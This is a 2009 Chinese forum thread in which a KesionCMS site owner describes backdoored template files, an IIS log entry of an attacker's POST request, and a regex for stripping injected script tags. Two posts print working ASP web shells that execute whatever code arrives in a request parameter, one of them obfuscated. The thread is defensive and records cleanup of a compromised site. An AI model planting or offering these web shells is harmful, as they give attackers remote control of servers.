账号通
    

账号  

密码  

5153

查看

22

回复
主题:被挂马的代码收集 [收藏主题] 转到:  
szchehang 当前离线

379

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:699 分
登录次数:505 次
注册时间:2009/8/19
最后登录:2013/4/11
szchehang 发表于:2009/9/17 16:35:00   | 显示全部帖子 查看该作者主题 楼主 

还有个文件名好像是bottum.asp ,吧,,通过IIS日志可以查看到。

 

POST /Template/rss.asp nor=1&en=1&asp=1&dot=1 80 - 58.61.36.103

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
szchehang 当前离线

379

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:699 分
登录次数:505 次
注册时间:2009/8/19
最后登录:2013/4/11
szchehang 发表于:2009/9/17 16:32:00   | 显示全部帖子 查看该作者主题 沙发 
科汛在线商城系统(NET)

有这些代码的文件都要删掉。
<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

 


<%execute request("#")%>

 

好像是Template目录下的rss.asp,C00N.asp等文件吧,文件可能还被隐藏了,真是害人不浅。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
szchehang 当前离线

379

主题

0

广播

0

粉丝
添加关注
级别:三年级

用户积分:699 分
登录次数:505 次
注册时间:2009/8/19
最后登录:2013/4/11
szchehang 发表于:2009/9/17 13:03:00   | 显示全部帖子 查看该作者主题 藤椅 
做在线知识付费 选科汛云开店

可以正则添换

 

(<script).*?(ft917.3322|%3|i%63xxw|%69cxxw|ic%78xw|icx%78w).*?(\/script>)添换为空格

 

用ultraedit可以添换目录下的所有文件

 

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.11133秒 powered by KesionCMS 9.0